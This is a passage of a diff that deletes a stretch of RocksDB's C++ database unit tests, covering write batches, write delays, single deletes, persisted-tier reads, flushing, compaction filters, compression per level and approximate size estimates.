-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-
-  delete db;
-
-  options.create_if_missing = false;
-  ASSERT_OK(DB::Open(options, "/dir/db", &db));
-  for (size_t i = 0; i < 3; ++i) {
-    std::string res;
-    ASSERT_OK(db->Get(ReadOptions(), keys[i], &res));
-    ASSERT_TRUE(res == vals[i]);
-  }
-  delete db;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, WriteEmptyBatch) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  ASSERT_OK(Put(1, "foo", "bar"));
-  WriteOptions wo;
-  wo.sync = true;
-  wo.disableWAL = false;
-  WriteBatch empty_batch;
-  ASSERT_OK(dbfull()->Write(wo, &empty_batch));
-
-  // make sure we can re-open it.
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-  ASSERT_EQ("bar", Get(1, "foo"));
-}
-
-TEST_F(DBTest, SkipDelay) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  for (bool sync : {true, false}) {
-    for (bool disableWAL : {true, false}) {
-      // Use a small number to ensure a large delay that is still effective
-      // when we do Put
-      // TODO(myabandeh): this is time dependent and could potentially make
-      // the test flaky
-      auto token = dbfull()->TEST_write_controler().GetDelayToken(1);
-      std::atomic<int> sleep_count(0);
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "DBImpl::DelayWrite:Sleep",
-          [&](void* arg) { sleep_count.fetch_add(1); });
-      std::atomic<int> wait_count(0);
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "DBImpl::DelayWrite:Wait",
-          [&](void* arg) { wait_count.fetch_add(1); });
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-      WriteOptions wo;
-      wo.sync = sync;
-      wo.disableWAL = disableWAL;
-      wo.no_slowdown = true;
-      dbfull()->Put(wo, "foo", "bar");
-      // We need the 2nd write to trigger delay. This is because delay is
-      // estimated based on the last write size which is 0 for the first write.
-      ASSERT_NOK(dbfull()->Put(wo, "foo2", "bar2"));
-      ASSERT_GE(sleep_count.load(), 0);
-      ASSERT_GE(wait_count.load(), 0);
-      token.reset();
-
-      token = dbfull()->TEST_write_controler().GetDelayToken(1000000000);
-      wo.no_slowdown = false;
-      ASSERT_OK(dbfull()->Put(wo, "foo3", "bar3"));
-      ASSERT_GE(sleep_count.load(), 1);
-      token.reset();
-    }
-  }
-}
-
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBTest, LevelLimitReopen) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const std::string value(1024 * 1024, ' ');
-  int i = 0;
-  while (NumTableFilesAtLevel(2, 1) == 0) {
-    ASSERT_OK(Put(1, Key(i++), value));
-  }
-
-  options.num_levels = 1;
-  options.max_bytes_for_level_multiplier_additional.resize(1, 1);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ(s.IsInvalidArgument(), true);
-  ASSERT_EQ(s.ToString(),
-            "Invalid argument: db has more levels than options.num_levels");
-
-  options.num_levels = 10;
-  options.max_bytes_for_level_multiplier_additional.resize(10, 1);
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-#endif  // ROCKSDB_LITE
-
-
-TEST_F(DBTest, PutSingleDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo2", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo2"));
-    ASSERT_OK(SingleDelete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBTest, ReadFromPersistedTier) {
-  do {
-    Random rnd(301);
-    Options options = CurrentOptions();
-    for (int disableWAL = 0; disableWAL <= 1; ++disableWAL) {
-      CreateAndReopenWithCF({"pikachu"}, options);
-      WriteOptions wopt;
-      wopt.disableWAL = (disableWAL == 1);
-      // 1st round: put but not flush
-      ASSERT_OK(db_->Put(wopt, handles_[1], "foo", "first"));
-      ASSERT_OK(db_->Put(wopt, handles_[1], "bar", "one"));
-      ASSERT_EQ("first", Get(1, "foo"));
-      ASSERT_EQ("one", Get(1, "bar"));
-
-      // Read directly from persited data.
-      ReadOptions ropt;
-      ropt.read_tier = kPersistedTier;
-      std::string value;
-      if (wopt.disableWAL) {
-        // as data has not yet being flushed, we expect not found.
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).IsNotFound());
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).IsNotFound());
-      } else {
-        ASSERT_OK(db_->Get(ropt, handles_[1], "foo", &value));
-        ASSERT_OK(db_->Get(ropt, handles_[1], "bar", &value));
-      }
-
-      // Multiget
-      std::vector<ColumnFamilyHandle*> multiget_cfs;
-      multiget_cfs.push_back(handles_[1]);
-      multiget_cfs.push_back(handles_[1]);
-      std::vector<Slice> multiget_keys;
-      multiget_keys.push_back("foo");
-      multiget_keys.push_back("bar");
-      std::vector<std::string> multiget_values;
-      auto statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[0].IsNotFound());
-        ASSERT_TRUE(statuses[1].IsNotFound());
-      } else {
-        ASSERT_OK(statuses[0]);
-        ASSERT_OK(statuses[1]);
-      }
-
-      // 2nd round: flush and put a new value in memtable.
-      ASSERT_OK(Flush(1));
-      ASSERT_OK(db_->Put(wopt, handles_[1], "rocksdb", "hello"));
-
-      // once the data has been flushed, we are able to get the
-      // data when kPersistedTier is used.
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).ok());
-      ASSERT_EQ(value, "first");
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).ok());
-      ASSERT_EQ(value, "one");
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(
-            db_->Get(ropt, handles_[1], "rocksdb", &value).IsNotFound());
-      } else {
-        ASSERT_OK(db_->Get(ropt, handles_[1], "rocksdb", &value));
-        ASSERT_EQ(value, "hello");
-      }
-
-      // Expect same result in multiget
-      multiget_cfs.push_back(handles_[1]);
-      multiget_keys.push_back("rocksdb");
-      statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      ASSERT_TRUE(statuses[0].ok());
-      ASSERT_EQ("first", multiget_values[0]);
-      ASSERT_TRUE(statuses[1].ok());
-      ASSERT_EQ("one", multiget_values[1]);
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[2].IsNotFound());
-      } else {
-        ASSERT_OK(statuses[2]);
-      }
-
-      // 3rd round: delete and flush
-      ASSERT_OK(db_->Delete(wopt, handles_[1], "foo"));
-      Flush(1);
-      ASSERT_OK(db_->Delete(wopt, handles_[1], "bar"));
-
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "foo", &value).IsNotFound());
-      if (wopt.disableWAL) {
-        // Still expect finding the value as its delete has not yet being
-        // flushed.
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).ok());
-        ASSERT_EQ(value, "one");
-      } else {
-        ASSERT_TRUE(db_->Get(ropt, handles_[1], "bar", &value).IsNotFound());
-      }
-      ASSERT_TRUE(db_->Get(ropt, handles_[1], "rocksdb", &value).ok());
-      ASSERT_EQ(value, "hello");
-
-      statuses =
-          db_->MultiGet(ropt, multiget_cfs, multiget_keys, &multiget_values);
-      ASSERT_TRUE(statuses[0].IsNotFound());
-      if (wopt.disableWAL) {
-        ASSERT_TRUE(statuses[1].ok());
-        ASSERT_EQ("one", multiget_values[1]);
-      } else {
-        ASSERT_TRUE(statuses[1].IsNotFound());
-      }
-      ASSERT_TRUE(statuses[2].ok());
-      ASSERT_EQ("hello", multiget_values[2]);
-      if (wopt.disableWAL == 0) {
-        DestroyAndReopen(options);
-      }
-    }
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBTest, SingleDeleteFlush) {
-  // Test to check whether flushing preserves a single delete hidden
-  // behind a put.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Put values on second level (so that they will not be in the same
-    // compaction as the other operations.
-    Put(1, "foo", "first");
-    Put(1, "bar", "one");
-    ASSERT_OK(Flush(1));
-    MoveFilesToLevel(2, 1);
-
-    // (Single) delete hidden by a put
-    SingleDelete(1, "foo");
-    Put(1, "foo", "second");
-    Delete(1, "bar");
-    Put(1, "bar", "two");
-    ASSERT_OK(Flush(1));
-
-    SingleDelete(1, "foo");
-    Delete(1, "bar");
-    ASSERT_OK(Flush(1));
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    ASSERT_EQ("NOT_FOUND", Get(1, "bar"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBTest, SingleDeletePutFlush) {
-  // Single deletes that encounter the matching put in a flush should get
-  // removed.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", Slice());
-    Put(1, "a", Slice());
-    SingleDelete(1, "a");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("[ ]", AllEntriesFor("a", 1));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-// Disable because not all platform can run it.
-// It requires more than 9GB memory to run it, With single allocation
-// of more than 3GB.
-TEST_F(DBTest, DISABLED_VeryLargeValue) {
-  const size_t kValueSize = 3221225472u;  // 3GB value
-  const size_t kKeySize = 8388608u;       // 8MB key
-  std::string raw(kValueSize, 'v');
-  std::string key1(kKeySize, 'c');
-  std::string key2(kKeySize, 'd');
-
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.write_buffer_size = 100000;  // Small write buffer
-  options.paranoid_checks = true;
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("boo", "v1"));
-  ASSERT_OK(Put("foo", "v1"));
-  ASSERT_OK(Put(key1, raw));
-  raw[0] = 'w';
-  ASSERT_OK(Put(key2, raw));
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  std::string value;
-  Status s = db_->Get(ReadOptions(), key1, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('v', value[0]);
-
-  s = db_->Get(ReadOptions(), key2, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('w', value[0]);
-
-  // Compact all files.
-  Flush();
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  // Check DB is not in read-only state.
-  ASSERT_OK(Put("boo", "v1"));
-
-  s = db_->Get(ReadOptions(), key1, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('v', value[0]);
-
-  s = db_->Get(ReadOptions(), key2, &value);
-  ASSERT_OK(s);
-  ASSERT_EQ(kValueSize, value.size());
-  ASSERT_EQ('w', value[0]);
-}
-
-TEST_F(DBTest, GetFromImmutableLayer) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-
-    // Block sync calls
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-    Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-    Put(1, "k2", std::string(100000, 'y'));  // Trigger flush
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-    // Release sync calls
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-  } while (ChangeOptions());
-}
-
-
-TEST_F(DBTest, GetLevel0Ordering) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Check that we process level-0 files in correct order.  The code
-    // below generates two level-0 files where the earlier one comes
-    // before the later one in the level-0 file list since the earlier
-    // one has a smaller "smallest" key.
-    ASSERT_OK(Put(1, "bar", "b"));
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v2", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, WrongLevel0Config) {
-  Options options = CurrentOptions();
-  Close();
-  ASSERT_OK(DestroyDB(dbname_, options));
-  options.level0_stop_writes_trigger = 1;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_file_num_compaction_trigger = 3;
-  ASSERT_OK(DB::Open(options, dbname_, &db_));
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, GetOrderedByLevels) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    Compact(1, "a", "z");
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v2", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, GetPicksCorrectFile) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Arrange to have multiple files in a non-level-0 level.
-    ASSERT_OK(Put(1, "a", "va"));
-    Compact(1, "a", "b");
-    ASSERT_OK(Put(1, "x", "vx"));
-    Compact(1, "x", "y");
-    ASSERT_OK(Put(1, "f", "vf"));
-    Compact(1, "f", "g");
-    ASSERT_EQ("va", Get(1, "a"));
-    ASSERT_EQ("vf", Get(1, "f"));
-    ASSERT_EQ("vx", Get(1, "x"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBTest, GetEncountersEmptyLevel) {
-  do {
-    Options options = CurrentOptions();
-    CreateAndReopenWithCF({"pikachu"}, options);
-    // Arrange for the following to happen:
-    //   * sstable A in level 0
-    //   * nothing in level 1
-    //   * sstable B in level 2
-    // Then do enough Get() calls to arrange for an automatic compaction
-    // of sstable A.  A bug would cause the compaction to be marked as
-    // occurring at level 1 (instead of the correct level 0).
-
-    // Step 1: First place sstables in levels 0 and 2
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    ASSERT_OK(Flush(1));
-    ASSERT_GT(NumTableFilesAtLevel(0, 1), 0);
-    ASSERT_GT(NumTableFilesAtLevel(2, 1), 0);
-
-    // Step 2: clear level 1 if necessary.
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 1);
-    ASSERT_EQ(NumTableFilesAtLevel(1, 1), 0);
-    ASSERT_EQ(NumTableFilesAtLevel(2, 1), 1);
-
-    // Step 3: read a bunch of times
-    for (int i = 0; i < 1000; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, "missing"));
-    }
-
-    // Step 4: Wait for compaction to finish
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ(NumTableFilesAtLevel(0, 1), 1);  // XXX
-  } while (ChangeOptions(kSkipUniversalCompaction | kSkipFIFOCompaction));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FlushMultipleMemtable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = -1;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-    ASSERT_OK(Flush(1));
-  } while (ChangeCompactOptions());
-}
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, FlushSchedule) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_stop_writes_trigger = 1 << 10;
-  options.level0_slowdown_writes_trigger = 1 << 10;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 1;
-  options.max_write_buffer_number = 2;
-  options.write_buffer_size = 120 * 1024;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  std::vector<port::Thread> threads;
-
-  std::atomic<int> thread_num(0);
-  // each column family will have 5 thread, each thread generating 2 memtables.
-  // each column family should end up with 10 table files
-  std::function<void()> fill_memtable_func = [&]() {
-    int a = thread_num.fetch_add(1);
-    Random rnd(a);
-    WriteOptions wo;
-    // this should fill up 2 memtables
-    for (int k = 0; k < 5000; ++k) {
-      ASSERT_OK(db_->Put(wo, handles_[a & 1], RandomString(&rnd, 13), ""));
-    }
-  };
-
-  for (int i = 0; i < 10; ++i) {
-    threads.emplace_back(fill_memtable_func);
-  }
-
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  auto default_tables = GetNumberOfSstFilesForColumnFamily(db_, "default");
-  auto pikachu_tables = GetNumberOfSstFilesForColumnFamily(db_, "pikachu");
-  ASSERT_LE(default_tables, static_cast<uint64_t>(10));
-  ASSERT_GT(default_tables, static_cast<uint64_t>(0));
-  ASSERT_LE(pikachu_tables, static_cast<uint64_t>(10));
-  ASSERT_GT(pikachu_tables, static_cast<uint64_t>(0));
-}
-#endif  // ROCKSDB_LITE
-
-namespace {
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false)
-      : check_context_(check_context) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-}  // namespace
-
-#ifndef ROCKSDB_LITE
-
-static std::string CompressibleString(Random* rnd, int len) {
-  std::string r;
-  test::CompressibleString(rnd, 0.8, len, &r);
-  return r;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, FailMoreDbPaths) {
-  Options options = CurrentOptions();
-  options.db_paths.emplace_back(dbname_, 10000000);
-  options.db_paths.emplace_back(dbname_ + "_2", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_3", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_4", 1000000);
-  options.db_paths.emplace_back(dbname_ + "_5", 1000000);
-  ASSERT_TRUE(TryReopen(options).IsNotSupported());
-}
-
-void CheckColumnFamilyMeta(const ColumnFamilyMetaData& cf_meta) {
-  uint64_t cf_size = 0;
-  uint64_t cf_csize = 0;
-  size_t file_count = 0;
-  for (auto level_meta : cf_meta.levels) {
-    uint64_t level_size = 0;
-    uint64_t level_csize = 0;
-    file_count += level_meta.files.size();
-    for (auto file_meta : level_meta.files) {
-      level_size += file_meta.size;
-    }
-    ASSERT_EQ(level_meta.size, level_size);
-    cf_size += level_size;
-    cf_csize += level_csize;
-  }
-  ASSERT_EQ(cf_meta.file_count, file_count);
-  ASSERT_EQ(cf_meta.size, cf_size);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTest, ColumnFamilyMetaDataTest) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  int key_index = 0;
-  ColumnFamilyMetaData cf_meta;
-  for (int i = 0; i < 100; ++i) {
-    GenerateNewFile(&rnd, &key_index);
-    db_->GetColumnFamilyMetaData(&cf_meta);
-    CheckColumnFamilyMeta(cf_meta);
-  }
-}
-
-namespace {
-void MinLevelHelper(DBTest* self, Options& options) {
-  Random rnd(301);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    std::vector<std::string> values;
-    // Write 120KB (12 values, each 10K)
-    for (int i = 0; i < 12; i++) {
-      values.push_back(DBTestBase::RandomString(&rnd, 10000));
-      ASSERT_OK(self->Put(DBTestBase::Key(i), values[i]));
-    }
-    self->dbfull()->TEST_WaitForFlushMemTable();
-    ASSERT_EQ(self->NumTableFilesAtLevel(0), num + 1);
-  }
-
-  // generate one more file in level-0, and should trigger level-0 compaction
-  std::vector<std::string> values;
-  for (int i = 0; i < 12; i++) {
-    values.push_back(DBTestBase::RandomString(&rnd, 10000));
-    ASSERT_OK(self->Put(DBTestBase::Key(i), values[i]));
-  }
-  self->dbfull()->TEST_WaitForCompact();
-
-  ASSERT_EQ(self->NumTableFilesAtLevel(0), 0);
-  ASSERT_EQ(self->NumTableFilesAtLevel(1), 1);
-}
-
-// returns false if the calling-Test should be skipped
-bool MinLevelToCompress(CompressionType& type, Options& options, int wbits,
-                        int lev, int strategy) {
-  fprintf(stderr,
-          "Test with compression options : window_bits = %d, level =  %d, "
-          "strategy = %d}\n",
-          wbits, lev, strategy);
-  options.write_buffer_size = 100 << 10;  // 100KB
-  options.arena_block_size = 4096;
-  options.num_levels = 3;
-  options.level0_file_num_compaction_trigger = 3;
-  options.create_if_missing = true;
-
-  if (Snappy_Supported()) {
-    type = kSnappyCompression;
-    fprintf(stderr, "using snappy\n");
-  } else if (Zlib_Supported()) {
-    type = kZlibCompression;
-    fprintf(stderr, "using zlib\n");
-  } else if (BZip2_Supported()) {
-    type = kBZip2Compression;
-    fprintf(stderr, "using bzip2\n");
-  } else if (LZ4_Supported()) {
-    type = kLZ4Compression;
-    fprintf(stderr, "using lz4\n");
-  } else if (XPRESS_Supported()) {
-    type = kXpressCompression;
-    fprintf(stderr, "using xpress\n");
-  } else if (ZSTD_Supported()) {
-    type = kZSTD;
-    fprintf(stderr, "using ZSTD\n");
-  } else {
-    fprintf(stderr, "skipping test, compression disabled\n");
-    return false;
-  }
-  options.compression_per_level.resize(options.num_levels);
-
-  // do not compress L0
-  for (int i = 0; i < 1; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 1; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  return true;
-}
-}  // namespace
-
-TEST_F(DBTest, MinLevelToCompress1) {
-  Options options = CurrentOptions();
-  CompressionType type = kSnappyCompression;
-  if (!MinLevelToCompress(type, options, -14, -1, 0)) {
-    return;
-  }
-  Reopen(options);
-  MinLevelHelper(this, options);
-
-  // do not compress L0 and L1
-  for (int i = 0; i < 2; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 2; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  DestroyAndReopen(options);
-  MinLevelHelper(this, options);
-}
-
-TEST_F(DBTest, MinLevelToCompress2) {
-  Options options = CurrentOptions();
-  CompressionType type = kSnappyCompression;
-  if (!MinLevelToCompress(type, options, 15, -1, 0)) {
-    return;
-  }
-  Reopen(options);
-  MinLevelHelper(this, options);
-
-  // do not compress L0 and L1
-  for (int i = 0; i < 2; i++) {
-    options.compression_per_level[i] = kNoCompression;
-  }
-  for (int i = 2; i < options.num_levels; i++) {
-    options.compression_per_level[i] = type;
-  }
-  DestroyAndReopen(options);
-  MinLevelHelper(this, options);
-}
-
-// This test may fail because of a legit case that multiple L0 files
-// are trivial moved to L1.
-TEST_F(DBTest, DISABLED_RepeatedWritesToSameKey) {
-  do {
-    Options options = CurrentOptions();
-    options.env = env_;
-    options.write_buffer_size = 100000;  // Small write buffer
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // We must have at most one file per level except for level-0,
-    // which may have up to kL0_StopWritesTrigger files.
-    const int kMaxFiles =
-        options.num_levels + options.level0_stop_writes_trigger;
-
-    Random rnd(301);
-    std::string value =
-        RandomString(&rnd, static_cast<int>(2 * options.write_buffer_size));
-    for (int i = 0; i < 5 * kMaxFiles; i++) {
-      ASSERT_OK(Put(1, "key", value));
-      ASSERT_LE(TotalTableFiles(1), kMaxFiles);
-    }
-  } while (ChangeCompactOptions());
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTest, SparseMerge) {
-  do {
-    Options options = CurrentOptions();
-    options.compression = kNoCompression;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    FillLevels("A", "Z", 1);
-
-    // Suppose there is:
-    //    small amount of data with prefix A
-    //    large amount of data with prefix B
-    //    small amount of data with prefix C
-    // and that recent updates have made small changes to all three prefixes.
-    // Check that we do not do a compaction that merges all of B in one shot.
-    const std::string value(1000, 'x');
-    Put(1, "A", "va");
-    // Write approximately 100MB of "B" values
-    for (int i = 0; i < 100000; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-    Put(1, "C", "vc");
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-
-    // Make sparse update
-    Put(1, "A", "va2");
-    Put(1, "B100", "bvalue2");
-    Put(1, "C", "vc2");
-    ASSERT_OK(Flush(1));
-
-    // Compactions should not cause us to create a situation where
-    // a file overlaps too much data at the next level.
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr);
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-    dbfull()->TEST_CompactRange(1, nullptr, nullptr);
-    ASSERT_LE(dbfull()->TEST_MaxNextLevelOverlappingBytes(handles_[1]),
-              20 * 1048576);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-static bool Between(uint64_t val, uint64_t low, uint64_t high) {
-  bool result = (val >= low) && (val <= high);
-  if (!result) {
-    fprintf(stderr, "Value %llu is not in range [%llu, %llu]\n",
-            (unsigned long long)(val), (unsigned long long)(low),
-            (unsigned long long)(high));
-  }
-  return result;
-}
-
-TEST_F(DBTest, ApproximateSizesMemTable) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;  // Large write buffer
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  const int N = 128;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 1024)));
-  }
-
-  uint64_t size;
-  std::string start = Key(50);
-  std::string end = Key(60);
-  Range r(start, end);
-  uint8_t include_both = DB::SizeApproximationFlags::INCLUDE_FILES |
-                         DB::SizeApproximationFlags::INCLUDE_MEMTABLES;
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_GT(size, 6000);
-  ASSERT_LT(size, 204800);
-  // Zero if not including mem table
-  db_->GetApproximateSizes(&r, 1, &size);
-  ASSERT_EQ(size, 0);
-
-  start = Key(500);
-  end = Key(600);
-  r = Range(start, end);
-  db_->GetApproximateSizes(&r, 1, &size, include_both);
-  ASSERT_EQ(size, 0);
-
-  for (int i = 0; i < N; i++) {
